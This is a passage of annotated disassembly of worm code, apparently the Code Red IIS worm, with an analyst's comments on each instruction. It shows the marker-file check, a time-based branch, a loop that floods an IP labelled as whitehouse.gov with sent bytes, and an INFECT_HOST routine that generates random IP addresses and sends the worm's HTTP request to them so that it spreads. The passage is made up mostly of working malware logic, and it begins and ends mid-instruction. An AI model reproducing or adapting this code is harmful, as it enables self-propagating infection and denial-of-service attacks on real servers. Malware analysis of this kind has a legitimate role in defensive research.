4B dec ebx ; Decrement by 1<br />seg000:0000079D<br />seg000:0000079D DO_THE_WORK: ; CODE XREF: DO_RVA+3D5j<br />seg000:0000079D ; DO_RVA+40Dj ...<br />seg000:0000079D BA 01 00 00 00 mov edx, 1 ; this exits from sub 224, not positive of the end result.<br />seg000:000007A2 85 D2 test edx, edx ; if edx ==0, then jump down to c91<br />seg000:000007A4 0F 84 E7 04 00 00 jz TIGHT_LOOP ; This is a tight loop<br />seg000:000007AA 8B F4 mov esi, esp<br />seg000:000007AC 6A 00 push 0 ; HANDLE hTemplateFile // handle to template file<br />seg000:000007AE 68 80 00 00 00 push 80h ; '?' ; DWORD dwFlagsAndAttributes // file attributes<br />seg000:000007AE ; this is FILE_ATTRIBUTE_NORMAL<br />seg000:000007B3 6A 03 push 3 ; DWORD dwCreationDisposition // how to create<br />seg000:000007B3 ; this is for OPEN_EXISTING<br />seg000:000007B5 6A 00 push 0 ; LPSECURITY_ATTRIBUTES lpSecurityAttributes // SD<br />seg000:000007B7 6A 01 push 1 ; DWORD dwShareMode // share mode<br />seg000:000007B7 ; this equates to FILE_SHARE_READ<br />seg000:000007B9 68 00 00 00 80 push 80000000h ; DWORD dwDesiredAccess // access mode<br />seg000:000007B9 ; this is for GENERIC_READ<br />seg000:000007BE 8B 85 68 FE FF FF mov eax, [ebp-198h]<br />seg000:000007C4 83 C0 63 add eax, 63h ; 'c' ; this points eax to c:\notworm<br />seg000:000007C7 50 push eax ; LPCTSTR lpFileName // file name<br />seg000:000007C8 FF 95 9C FE FF FF call dword ptr [ebp-164h] ; CreateFileA<br />seg000:000007CE 3B F4 cmp esi, esp ; Compare Two Operands<br />seg000:000007D0 90 nop ; No Operation<br />seg000:000007D1 43 inc ebx ; Increment by 1<br />seg000:000007D2 4B dec ebx ; Decrement by 1<br />seg000:000007D3 43 inc ebx ; Increment by 1<br />seg000:000007D4 4B dec ebx ; Decrement by 1<br />seg000:000007D5 89 85 30 FE FF FF mov [ebp-1D0h], eax<br />seg000:000007DB 83 BD 30 FE FF FF+ cmp dword ptr [ebp-1D0h], 0FFFFFFFFh ; Compare Two Operands<br />seg000:000007E2 74 1F jz short NOTWORM_NO ; jump if Createfile failed<br />seg000:000007E4<br />seg000:000007E4 NOTWORM_YES: ; CODE XREF: HACK_PAGE+1B2j<br />seg000:000007E4 B9 01 00 00 00 mov ecx, 1<br />seg000:000007E9 85 C9 test ecx, ecx ; Logical Compare<br />seg000:000007EB 74 16 jz short NOTWORM_NO ; Jump if Zero (ZF=1)<br />seg000:000007ED 8B F4 mov esi, esp<br />seg000:000007EF 68 FF FF FF 7F push 7FFFFFFFh ; push a LONG time(basically forever)<br />seg000:000007F4 FF 95 A0 FE FF FF call dword ptr [ebp-160h] ; Sleep<br />seg000:000007F4 ;<br />seg000:000007FA 3B F4 cmp esi, esp ; Compare Two Operands<br />seg000:000007FC 90 nop ; No Operation<br />seg000:000007FD 43 inc ebx ; Increment by 1<br />seg000:000007FE 4B dec ebx ; Decrement by 1<br />seg000:000007FF 43 inc ebx ; Increment by 1<br />seg000:00000800 4B dec ebx ; Decrement by 1<br />seg000:00000801 EB E1 jmp short NOTWORM_YES ; Jump<br />seg000:00000803 ; ĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄč<br />seg000:00000803<br />seg000:00000803 NOTWORM_NO: ; CODE XREF: HACK_PAGE+193j<br />seg000:00000803 ; HACK_PAGE+19Cj<br />seg000:00000803 8B F4 mov esi, esp<br />seg000:00000805 8D 95 38 FE FF FF lea edx, [ebp-1C8h] ; LPSYSTEMTIME lpSystemTime // system time<br />seg000:0000080B 52 push edx<br />seg000:0000080C FF 95 94 FE FF FF call dword ptr [ebp-16Ch] ; GetSystemTime<br />seg000:00000812 3B F4 cmp esi, esp ; Compare Two Operands<br />seg000:00000814 90 nop ; No Operation<br />seg000:00000815 43 inc ebx ; Increment by 1<br />seg000:00000816 4B dec ebx ; Decrement by 1<br />seg000:00000817 43 inc ebx ; Increment by 1<br />seg000:00000818 4B dec ebx ; Decrement by 1<br />seg000:00000819 8B 85 3E FE FF FF mov eax, [ebp-1C2h] ; load eax with day and hour, UTC<br />seg000:0000081F 89 85 4C FE FF FF mov [ebp-1B4h], eax ; store day in ebp-1b4<br />seg000:00000825 8B 8D 4C FE FF FF mov ecx, [ebp-1B4h] ; set ecx to day and hour UTC<br />seg000:0000082B 81 E1 FF FF 00 00 and ecx, 0FFFFh ; get lower word(hour, UTC)<br />seg000:00000831 89 8D 4C FE FF FF mov [ebp-1B4h], ecx ; save the UTC hour at ebp-1b4<br />seg000:00000837 83 BD 4C FE FF FF+ cmp dword ptr [ebp-1B4h], 14h ; check if hour is less than 20<br />seg000:0000083E 0F 8C 47 01 00 00 jl INFECT_HOST ; set seconds and milisecond to eax<br />seg000:00000844<br />seg000:00000844 TIME_GREATER_20: ; CODE XREF: HACK_PAGE+337j<br />seg000:00000844 BA 01 00 00 00 mov edx, 1<br />seg000:00000849 85 D2 test edx, edx ; Logical Compare<br />seg000:0000084B 0F 84 3A 01 00 00 jz INFECT_HOST ; set seconds and milisecond to eax<br />seg000:00000851 8B F4 mov esi, esp<br />seg000:00000853 8D 85 38 FE FF FF lea eax, [ebp-1C8h] ; LPSYSTEMTIME lpSystemTime // system time<br />seg000:00000859 50 push eax<br />seg000:0000085A FF 95 94 FE FF FF call dword ptr [ebp-16Ch] ; GetSystemTime<br />seg000:00000860 3B F4 cmp esi, esp ; Compare Two Operands<br />seg000:00000862 90 nop ; No Operation<br />seg000:00000863 43 inc ebx ; Increment by 1<br />seg000:00000864 4B dec ebx ; Decrement by 1<br />seg000:00000865 43 inc ebx ; Increment by 1<br />seg000:00000866 4B dec ebx ; Decrement by 1<br />seg000:00000867 8B 8D 3E FE FF FF mov ecx, [ebp-1C2h] ; load ecx with day and hour, UTC<br />seg000:0000086D 89 8D 4C FE FF FF mov [ebp-1B4h], ecx ; store ecx in ebp-1b4<br />seg000:00000873 8B 95 4C FE FF FF mov edx, [ebp-1B4h]<br />seg000:00000879 81 E2 FF FF 00 00 and edx, 0FFFFh ; load edx with day and hour UTC<br />seg000:0000087F 89 95 4C FE FF FF mov [ebp-1B4h], edx<br />seg000:00000885 83 BD 4C FE FF FF+ cmp dword ptr [ebp-1B4h], 1Ch ; check if hour is less than 28<br />seg000:0000088C 7C 1F jl short WHITEHOUSE_SOCKET_SETUP ; Jump if Less (SF!=OF)<br />seg000:0000088E<br />seg000:0000088E NEVER_CALLED1: ; CODE XREF: HACK_PAGE+25Cj<br />seg000:0000088E B8 01 00 00 00 mov eax, 1 ; this code is self referential and is never called, as far as can be seen<br />seg000:00000893 85 C0 test eax, eax ; Logical Compare<br />seg000:00000895 74 16 jz short WHITEHOUSE_SOCKET_SETUP ; Jump if Zero (ZF=1)<br />seg000:00000897 8B F4 mov esi, esp<br />seg000:00000899 68 FF FF FF 7F push 7FFFFFFFh<br />seg000:0000089E FF 95 A0 FE FF FF call dword ptr [ebp-160h] ; Sleep<br />seg000:000008A4 3B F4 cmp esi, esp ; Compare Two Operands<br />seg000:000008A6 90 nop ; No Operation<br />seg000:000008A7 43 inc ebx ; Increment by 1<br />seg000:000008A8 4B dec ebx ; Decrement by 1<br />seg000:000008A9 43 inc ebx ; Increment by 1<br />seg000:000008AA 4B dec ebx ; Decrement by 1<br />seg000:000008AB EB E1 jmp short NEVER_CALLED1 ; this code is self referential and is never called, as far as can be seen<br />seg000:000008AD ; ĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄč<br />seg000:000008AD<br />seg000:000008AD WHITEHOUSE_SOCKET_SETUP: ; CODE XREF: HACK_PAGE+23Dj<br />seg000:000008AD ; HACK_PAGE+246j<br />seg000:000008AD 8B F4 mov esi, esp<br />seg000:000008AF 6A 64 push 64h ; 'd'<br />seg000:000008B1 FF 95 A0 FE FF FF call dword ptr [ebp-160h] ; Sleep<br />seg000:000008B7 3B F4 cmp esi, esp ; Compare Two Operands<br />seg000:000008B9 90 nop ; No Operation<br />seg000:000008BA 43 inc ebx ; Increment by 1<br />seg000:000008BB 4B dec ebx ; Decrement by 1<br />seg000:000008BC 43 inc ebx ; Increment by 1<br />seg000:000008BD 4B dec ebx ; Decrement by 1<br />seg000:000008BE 8B F4 mov esi, esp<br />seg000:000008C0 6A 00 push 0 ; int protocol<br />seg000:000008C2 6A 01 push 1 ; fam<br />seg000:000008C4 6A 02 push 2 ; pr<br />seg000:000008C6 FF 95 B8 FE FF FF call dword ptr [ebp-148h] ; socket<br />seg000:000008CC 3B F4 cmp esi, esp ; Compare Two Operands<br />seg000:000008CE 90 nop ; No Operation<br />seg000:000008CF 43 inc ebx ; Increment by 1<br />seg000:000008D0 4B dec ebx ; Decrement by 1<br />seg000:000008D1 43 inc ebx ; Increment by 1<br />seg000:000008D2 4B dec ebx ; Decrement by 1<br />seg000:000008D3 89 85 78 FE FF FF mov [ebp-188h], eax ; store sock descriptor<br />seg000:000008D9 66 C7 85 7C FE FF+ mov word ptr [ebp-184h], 2 ; set afam<br />seg000:000008E2 66 C7 85 7E FE FF+ mov word ptr [ebp-182h], 5000h ; set port(80)<br />seg000:000008EB C7 85 80 FE FF FF+ mov dword ptr [ebp-180h], 5BF089C6h ; set ip (www.whitehouse.gov)<br />seg000:000008F5 8B F4 mov esi, esp<br />seg000:000008F7 6A 10 push 10h ; push len<br />seg000:000008F9 8D 8D 7C FE FF FF lea ecx, [ebp-184h] ; push sockaddr<br />seg000:000008FF 51 push ecx<br />seg000:00000900 8B 95 78 FE FF FF mov edx, [ebp-188h] ; push sock descriptor<br />seg000:00000906 52 push edx<br />seg000:00000907 FF 95 BC FE FF FF call dword ptr [ebp-144h] ; connect<br />seg000:0000090D 3B F4 cmp esi, esp ; Compare Two Operands<br />seg000:0000090F 90 nop ; No Operation<br />seg000:00000910 43 inc ebx ; Increment by 1<br />seg000:00000911 4B dec ebx ; Decrement by 1<br />seg000:00000912 43 inc ebx ; Increment by 1<br />seg000:00000913 4B dec ebx ; Decrement by 1<br />seg000:00000914 C7 85 4C FE FF FF+ mov dword ptr [ebp-1B4h], 0 ; store 0 at ebp-1b4<br />seg000:0000091E EB 0F jmp short WHITEHOUSE_SOCKET_SEND ; if counter >= 18000h jump<br />seg000:00000920 ; ĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄč<br />seg000:00000920<br />seg000:00000920 WHITEHOUSE_SOCKET_SEND_INC: ; CODE XREF: HACK_PAGE+321j<br />seg000:00000920 8B 85 4C FE FF FF mov eax, [ebp-1B4h]<br />seg000:00000926 83 C0 01 add eax, 1 ; inc counter<br />seg000:00000929 89 85 4C FE FF FF mov [ebp-1B4h], eax<br />seg000:0000092F<br />seg000:0000092F WHITEHOUSE_SOCKET_SEND: ; CODE XREF: HACK_PAGE+2CFj<br />seg000:0000092F 81 BD 4C FE FF FF+ cmp dword ptr [ebp-1B4h], 18000h ; if counter >= 18000h jump<br />seg000:00000939 7D 37 jge short WHITEHOUSE_SLEEP_LOOP ; Jump if Greater or Equal (SF=OF)<br />seg000:0000093B 8B F4 mov esi, esp<br />seg000:0000093D 68 E8 03 00 00 push 3E8h<br />seg000:00000942 FF 95 A0 FE FF FF call dword ptr [ebp-160h] ; Sleep<br />seg000:00000948 3B F4 cmp esi, esp ; Compare Two Operands<br />seg000:0000094A 90 nop ; No Operation<br />seg000:0000094B 43 inc ebx ; Increment by 1<br />seg000:0000094C 4B dec ebx ; Decrement by 1<br />seg000:0000094D 43 inc ebx ; Increment by 1<br />seg000:0000094E 4B dec ebx ; Decrement by 1<br />seg000:0000094F 8B F4 mov esi, esp<br />seg000:00000951 6A 00 push 0 ; no flags<br />seg000:00000953 6A 01 push 1 ; send len 1<br />seg000:00000955 8D 8D FC FE FF FF lea ecx, [ebp-104h] ; addr of buf<br />seg000:0000095B 51 push ecx<br />seg000:0000095C 8B 95 78 FE FF FF mov edx, [ebp-188h] ; sock descriptor<br />seg000:00000962 52 push edx<br />seg000:00000963 FF 95 C0 FE FF FF call dword ptr [ebp-140h] ; Send<br />seg000:00000963 ;<br />seg000:00000963 ; sends 1 byte<br />seg000:00000969 3B F4 cmp esi, esp ; Compare Two Operands<br />seg000:0000096B 90 nop ; No Operation<br />seg000:0000096C 43 inc ebx ; Increment by 1<br />seg000:0000096D 4B dec ebx ; Decrement by 1<br />seg000:0000096E 43 inc ebx ; Increment by 1<br />seg000:0000096F 4B dec ebx ; Decrement by 1<br />seg000:00000970 EB AE jmp short WHITEHOUSE_SOCKET_SEND_INC ; jump back to send<br />seg000:00000972 ; ĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄč<br />seg000:00000972<br />seg000:00000972 WHITEHOUSE_SLEEP_LOOP: ; CODE XREF: HACK_PAGE+2EAj<br />seg000:00000972 8B F4 mov esi, esp<br />seg000:00000974 68 00 00 00 01 push 1000000h ; sleep for around 4.66 hours<br />seg000:00000979 FF 95 A0 FE FF FF call dword ptr [ebp-160h] ; Sleep<br />seg000:0000097F 3B F4 cmp esi, esp ; Compare Two Operands<br />seg000:00000981 90 nop ; No Operation<br />seg000:00000982 43 inc ebx ; Increment by 1<br />seg000:00000983 4B dec ebx ; Decrement by 1<br />seg000:00000984 43 inc ebx ; Increment by 1<br />seg000:00000985 4B dec ebx ; Decrement by 1<br />seg000:00000986 E9 B9 FE FF FF jmp TIME_GREATER_20 ; Jump<br />seg000:0000098B ; ĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄč<br />seg000:0000098B<br />seg000:0000098B INFECT_HOST: ; CODE XREF: HACK_PAGE+1EFj<br />seg000:0000098B ; HACK_PAGE+1FCj<br />seg000:0000098B 8B 85 44 FE FF FF mov eax, [ebp-1BCh] ; set seconds and milisecond to eax<br />seg000:00000991 89 85 50 FE FF FF mov [ebp-1B0h], eax ; store at ebp-1b0<br />seg000:00000997 8B 8D 50 FE FF FF mov ecx, [ebp-1B0h] ; load seconds and miliseconds to ecx<br />seg000:0000099D 0F AF 8D 50 FE FF+ imul ecx, [ebp-1B0h] ; multiply by itself<br />seg000:000009A4 69 C9 E3 59 CD 00 imul ecx, 0CD59E3h ; multiply by 0cd59e3<br />seg000:000009AA 8B 95 50 FE FF FF mov edx, [ebp-1B0h] ; store sec/milisec inedx<br />seg000:000009B0 69 D2 B9 E1 01 00 imul edx, 1E1B9h ; multiply sec/mil by 1e1b9<br />seg000:000009B6 8B 85 74 FE FF FF mov eax, [ebp-18Ch] ; set eax to the threadcount<br />seg000:000009BC 03 C1 add eax, ecx ; add ecx(multiplier) to eax<br />seg000:000009BE 03 D0 add edx, eax ; add eax to edx<br />seg000:000009C0 89 95 50 FE FF FF mov [ebp-1B0h], edx ; store new number at ebp-1b0<br />seg000:000009C6 8B 8D 74 FE FF FF mov ecx, [ebp-18Ch] ; load threadcount imul(o.5bd) into ecx<br />seg000:000009CC 69 C9 83 33 CF 00 imul ecx, 0CF3383h ; multiply it<br />seg000:000009D2 81 C1 53 FE 6B 07 add ecx, 76BFE53h ; add to it<br />seg000:000009D8 89 8D 74 FE FF FF mov [ebp-18Ch], ecx ; store it again<br />seg000:000009DE 8B 95 74 FE FF FF mov edx, [ebp-18Ch] ; set edx to the new val<br />seg000:000009E4 81 E2 FF 00 00 00 and edx, 0FFh ; get the last byte<br />seg000:000009EA 89 95 50 FE FF FF mov [ebp-1B0h], edx ; move the last byte to ebp-1b0<br />seg000:000009F0 83 BD 50 FE FF FF+ cmp dword ptr [ebp-1B0h], 7Fh ; '' ; check if the byte is 7F<br />seg000:000009F7 74 0C jz short loc_A05 ; if it is, go here<br />seg000:000009F9 81 BD 50 FE FF FF+ cmp dword ptr [ebp-1B0h], 0E0h ; 'ৠ; check if the last byteis 0e0<br />seg000:00000A03 75 11 jnz short loc_A16 ; if it is not, go here<br />seg000:00000A05<br />seg000:00000A05 loc_A05: ; CODE XREF: HACK_PAGE+3A8j<br />seg000:00000A05 8B 85 74 FE FF FF mov eax, [ebp-18Ch] ; load eax with the ebp-18c val<br />seg000:00000A0B 05 A9 0D 02 00 add eax, 20DA9h ; add 20da9 to it<br />seg000:00000A10 89 85 74 FE FF FF mov [ebp-18Ch], eax ; set the value to the new value<br />seg000:00000A16<br />seg000:00000A16 loc_A16: ; CODE XREF: HACK_PAGE+3B4j<br />seg000:00000A16 8B F4 mov esi, esp ; sleep for 100 ms<br />seg000:00000A18 6A 64 push 64h ; 'd' ; 100 miliseconds<br />seg000:00000A1A FF 95 A0 FE FF FF call dword ptr [ebp-160h] ; Sleep<br />seg000:00000A20 3B F4 cmp esi, esp ; Compare Two Operands<br />seg000:00000A22 90 nop ; No Operation<br />seg000:00000A23 43 inc ebx ; Increment by 1<br />seg000:00000A24 4B dec ebx ; Decrement by 1<br />seg000:00000A25 43 inc ebx ; Increment by 1<br />seg000:00000A26 4B dec ebx ; Decrement by 1<br />seg000:00000A27 8B F4 mov esi, esp ; Create a socket<br />seg000:00000A29 6A 00 push 0 ; int protocol<br />seg000:00000A2B 6A 01 push 1 ; int type<br />seg000:00000A2D 6A 02 push 2 ; int af<br />seg000:00000A2F FF 95 B8 FE FF FF call dword ptr [ebp-148h] ; socket<br />seg000:00000A35 3B F4 cmp esi, esp ; Compare Two Operands<br />seg000:00000A37 90 nop ; No Operation<br />seg000:00000A38 43 inc ebx ; Increment by 1<br />seg000:00000A39 4B dec ebx ; Decrement by 1<br />seg000:00000A3A 43 inc ebx ; Increment by 1<br />seg000:00000A3B 4B dec ebx ; Decrement by 1<br />seg000:00000A3C 89 85 78 FE FF FF mov [ebp-188h], eax ; save the sock descriptor to ebp-188<br />seg000:00000A42 66 C7 85 7C FE FF+ mov word ptr [ebp-184h], 2 ; this sets up the socaddr struct<br />seg000:00000A4B 66 C7 85 7E FE FF+ mov word ptr [ebp-182h], 5000h<br />seg000:00000A54 8B 8D 74 FE FF FF mov ecx, [ebp-18Ch] ; load ecx with the ip address<br />seg000:00000A5A 89 8D 80 FE FF FF mov [ebp-180h], ecx ; set ebp-180 to the ipaddress<br />seg000:00000A60 8B F4 mov esi, esp<br />seg000:00000A62 6A 10 push 10h ; int namelen<br />seg000:00000A64 8D 95 7C FE FF FF lea edx, [ebp-184h] ; Load Effective Address<br />seg000:00000A6A 52 push edx ; const struct sockaddr FAR *name<br />seg000:00000A6B 8B 85 78 FE FF FF mov eax, [ebp-188h]<br />seg000:00000A71 50 push eax ; SOCKET s<br />seg000:00000A72 FF 95 BC FE FF FF call dword ptr [ebp-144h] ; connect<br />seg000:00000A78 3B F4 cmp esi, esp ; Compare Two Operands<br />seg000:00000A7A 90 nop ; No Operation<br />seg000:00000A7B 43 inc ebx ; Increment by 1<br />seg000:00000A7C 4B dec ebx ; Decrement by 1<br />seg000:00000A7D 43 inc ebx ; Increment by 1<br />seg000:00000A7E 4B dec ebx ; Decrement by 1<br />seg000:00000A7F 85 C0 test eax, eax ; check if the connect succeeded<br />seg000:00000A81 0F 85 EF 01 00 00 jnz SOCK_CLOSE_LOOP ; if the connect failed goto closesocketloop<br />seg000:00000A87 8B F4 mov esi, esp ; Send a "GET "<br />seg000:00000A89 6A 00 push 0<br />seg000:00000A8B 6A 04 push 4<br />seg000:00000A8D 8B 8D 68 FE FF FF mov ecx, [ebp-198h] ; points to GET<br />seg000:00000A93 51 push ecx<br />seg000:00000A94 8B 95 78 FE FF FF mov edx, [ebp-188h] ; points to socket<br />seg000:00000A9A 52 push edx<br />seg000:00000A9B FF 95 C0 FE FF FF call dword ptr [ebp-140h] ; send a GET<br />seg000:00000AA1 3B F4 cmp esi, esp ; Compare Two Operands<br />seg000:00000AA3 90 nop ; No Operation<br />seg000:00000AA4 43 inc ebx ; Increment by 1<br />seg000:00000AA5 4B dec ebx ; Decrement by 1<br />seg000:00000AA6 43 inc ebx ; Increment by 1<br />seg000:00000AA7 4B dec ebx ; Decrement by 1<br />seg000:00000AA8 C7 85 4C FE FF FF+ mov dword ptr [ebp-1B4h], 0 ; store a 0 in 1b4<br />seg000:00000AB2 8B 45 08 mov eax, [ebp+8] ; load isapi filter<br />seg000:00000AB5 8B 48 68 mov ecx, [eax+68h] ; set ecx to offset inside isapi filter<br />seg000:00000AB8 89 8D 64 FE FF FF mov [ebp-19Ch], ecx ; store isapi pointer at ebp-19c<br />seg000:00000ABE EB 1E jmp short SETUP_URL_TO_SEND ; load ecx with isapi offset<br />seg000:00000AC0 ; ĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄč<br />seg000:00000AC0<br />seg000:00000AC0 GET_NEXT_URL_BYTE: ; CODE XREF: HACK_PAGE+49Cj<br />seg000:00000AC0 8B 95 64 FE FF FF mov edx, [ebp-19Ch] ; increment the url pointer at ebp-19c<br />seg000:00000AC6 83 C2 01 add edx, 1 ; Add<br />seg000:00000AC9 89 95 64 FE FF FF mov [ebp-19Ch], edx<br />seg000:00000ACF 8B 85 4C FE FF FF mov eax, [ebp-1B4h] ; inc counter<br />seg000:00000AD5 83 C0 01 add eax, 1 ; Add<br />seg000:00000AD8 89 85 4C FE FF FF mov [ebp-1B4h], eax<br />seg000:00000ADE<br />seg000:00000ADE SETUP_URL_TO_SEND: ; CODE XREF: HACK_PAGE+46Fj<br />seg000:00000ADE 8B 8D 64 FE FF FF mov ecx, [ebp-19Ch] ; load ecx with isapi offset<br />seg000:00000AE4 0F BE 11 movsx edx, byte ptr [ecx] ; move the byte to edx<br />seg000:00000AE7 85 D2 test edx, edx ; look for null<br />seg000:00000AE9 74 02 jz short SEND_URL ; if it's null, then go here<br />seg000:00000AEB EB D3 jmp short GET_NEXT_URL_BYTE ; else go here<br />seg000:00000AED ; ĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄč<br />seg000:00000AED<br />seg000:00000AED SEND_URL: ; CODE XREF: HACK_PAGE+49Aj<br />seg000:00000AED 8B F4 mov esi, esp<br />seg000:00000AEF 6A 00 push 0 ; no flags<br />seg000:00000AF1 8B 85 4C FE FF FF mov eax, [ebp-1B4h]<br />seg000:00000AF7 50 push eax ; push size<br />seg000:00000AF8 8B 4D 08 mov ecx, [ebp+8]<br />seg000:00000AFB 8B 51 68 mov edx, [ecx+68h] ; pointer to beginning of request<br />seg000:00000AFE 52 push edx<br />seg000:00000AFF 8B 85 78 FE FF FF mov eax, [ebp-188h] ; push socket<br />seg000:00000B05 50 push eax<br />seg000:00000B06 FF 95 C0 FE FF FF call dword ptr [ebp-140h] ; send<br />seg000:00000B0C 3B F4 cmp esi, esp ; Compare Two Operands<br />seg000:00000B0E 90 nop ; No Operation<br />seg000:00000B0F 43 inc ebx ; Increment by 1<br />seg000:00000B10 4B dec ebx ; Decrement by 1<br />seg000:00000B11 43 inc ebx ; Increment by 1<br />seg000:00000B12 4B dec ebx ; Decrement by 1<br />seg000:00000B13 8B F4 mov esi, esp ; send "?" query specifier<br />seg000:00000B15 6A 00 push 0 ; no flags<br />seg000:00000B17 6A 01 push 1 ; push size 1<br />seg000:00000B19 8B 8D 68 FE FF FF mov ecx, [ebp-198h]<br />seg000:00000B1F 83 C1 05 add ecx, 5 ; set pointer to 3f<br />seg000:00000B22 51 push ecx<br />seg000:00000B23 8B 95 78 FE FF FF mov edx, [ebp-188h] ; push sock desc<br />seg000:00000B29 52 push edx<br />seg000:00000B2A FF 95 C0 FE FF FF call dword ptr [ebp-140h] ; send<br />seg000:00000B30 3B F4 cmp esi, esp ; Compare Two Operands<br />seg000:00000B32 90 nop ; No Operation<br />seg000:00000B33 43 inc ebx ; Increment by 1<br />seg000:00000B34 4B dec ebx ; Decrement by 1<br />seg000:00000B35 43 inc ebx ; Increment by 1<br />seg000:00000B36 4B dec ebx ; Decrement by 1<br />seg000:00000B37 C7 85 4C FE FF FF+ mov dword ptr [ebp-1B4h], 0 ; set counter to 0<br />seg000:00000B41 8B 45 08 mov eax, [ebp+8] ; load headers<br />seg000:00000B44 8B 48 64 mov ecx, [eax+64h]<br />seg000:00000B47 89 8D 64 FE FF FF mov [ebp-19Ch], ecx ; store headers addr at ebp-19c<br />seg000:00000B4D EB 1E jmp short SETUP_QUERY_TO_SEND ; Jump<br />seg000:00000B4F ; ĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄč<br />seg000:00000B4F<br />seg000:00000B4F GET_NEXT_QUERY_BYTE: ; CODE XREF: HACK_PAGE+52Bj<br />seg000:00000B4F 8B 95 64 FE FF FF mov edx, [ebp-19Ch] ; increment the memory pointer to the headers<br />seg000:00000B55 83 C2 01 add edx, 1 ; Add<br />seg000:00000B58 89 95 64 FE FF FF mov [ebp-19Ch], edx<br />seg000:00000B5E 8B 85 4C FE FF FF mov eax, [ebp-1B4h] ; increment the counter<br />seg000:00000B64 83 C0 01 add eax, 1 ; Add<br />seg000:00000B67 89 85 4C FE FF FF mov [ebp-1B4h], eax<br />seg000:00000B6D<br />seg000:00000B6D SETUP_QUERY_TO_SEND: ; CODE XREF: HACK_PAGE+4FEj<br />seg000:00000B6D 8B 8D 64 FE FF FF mov ecx, [ebp-19Ch]<br />seg000:00000B73 0F BE 11 movsx edx, byte ptr [ecx] ; Move with Sign-Extend<br />seg000:00000B76 85 D2 test edx, edx ; Logical Compare<br />seg000:00000B78 74 02 jz short SEND_QUERY ; Jump if Zero (ZF=1)<br />seg000:00000B7A EB D3 jmp short GET_NEXT_QUERY_BYTE ; increment the memory pointer to the headers<br />seg000:00000B7C ; ĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄč<br />seg000:00000B7C<br />seg000:00000B7C SEND_QUERY: ; CODE XREF: HACK_PAGE+529j<br />seg000:00000B7C 8B F4 mov esi, esp<br />seg000:00000B7E 6A 00 push 0 ; no flags<br />seg000:00000B80 8B 85 4C FE FF FF mov eax, [ebp-1B4h] ; push size of headers<br />seg000:00000B86 50 push eax<br />seg000:00000B87 8B 4D 08 mov ecx, [ebp+8]<br />seg000:00000B8A 8B 51 64 mov edx, [ecx+64h]<br />seg000:00000B8D 52 push edx ; push addr pointing to headers<br />seg000:00000B8E 8B 85 78 FE FF FF mov eax, [ebp-188h]<br />seg000:00000B94 50 push eax ; push sock descriptor<br />seg000:00000B95 FF 95 C0 FE FF FF call dword ptr [ebp-140h] ; send<br />seg000:00000B95 ; send the headers<br />seg000:00000B9B 3B F4 cmp esi, esp ; Compare Two Operands<br />seg000:00000B9D 90 nop ; No Operation<br />seg000:00000B9E 43 inc ebx ; Increment by 1<br />seg000:00000B9F 4B dec ebx ; Decrement by 1<br />seg000:00000BA0 43 inc ebx ; Increment by 1<br />seg000:00000BA1 4B dec ebx ; Decrement by 1<br />seg000:00000BA2 C7 85 4C FE FF FF+ mov dword ptr [ebp-1B4h], 0 ; reset counter to 0<br />seg000:00000BAC 8B 8D 68 FE FF FF mov ecx, [ebp-198h] ; set ebp-19c to our headers<br />seg000:00000BB2 83 C1 07 add ecx, 7 ; Add<br />seg000:00000BB5 89 8D 64 FE FF FF mov [ebp-19Ch], ecx<br />seg000:00000BBB EB 1E jmp short SETUP_HEADERS_TO_SEND ; Jump<br />seg000:00000BBD ; ĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄč<br />seg000:00000BBD<br />seg000:00000BBD GET_NEXT_HEADERS: ; CODE XREF: HACK_PAGE+599j<br />seg000:00000BBD 8B 95 64 FE FF FF mov edx, [ebp-19Ch]<br />seg000:00000BC3 83 C2 01 add edx, 1 ; Add<br />seg000:00000BC6 89 95 64 FE FF FF mov [ebp-19Ch], edx<br />seg000:00000BCC 8B 85 4C FE FF FF mov eax, [ebp-1B4h]<br />seg000:00000BD2 83 C0 01 add eax, 1 ; Add<br />seg000:00000BD5 89 85 4C FE FF FF mov [ebp-1B4h], eax<br />seg000:00000BDB<br />seg000:00000BDB SETUP_HEADERS_TO_SEND: ; CODE XREF: HACK_PAGE+56Cj<br />seg000:00000BDB 8B 8D 64 FE FF FF mov ecx, [ebp-19Ch]<br />seg000:00000BE1 0F BE 11 movsx edx, byte ptr [ecx] ; Move with Sign-Extend<br />seg000:00000BE4 85 D2 test edx, edx ; Logical Compare<br />seg000:00000BE6 74 02 jz short SEND_HEADERS ; Jump if Zero (ZF=1)<br />seg000:00000BE8 EB D3 jmp short GET_NEXT_HEADERS ; Jump<br />seg000:00000BEA ; ĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄč<br />seg000:00000BEA<br />seg000:00000BEA SEND_HEADERS: ; CODE XREF: HACK_PAGE+597j<br />seg000:00000BEA 8B F4 mov esi, esp<br />seg000:00000BEC 6A 00 push 0<br />seg000:00000BEE 8B 85 4C FE FF FF mov eax, [ebp-1B4h] ; push counted size<br />seg000:00000BF4 50 push eax<br />seg000:00000BF5 8B 8D 68 FE FF FF mov ecx, [ebp-198h] ; push addr of our headers<br />seg000:00000BFB 83 C1 07 add ecx, 7 ; Add<br />seg000:00000BFE 51 push ecx<br />seg000:00000BFF 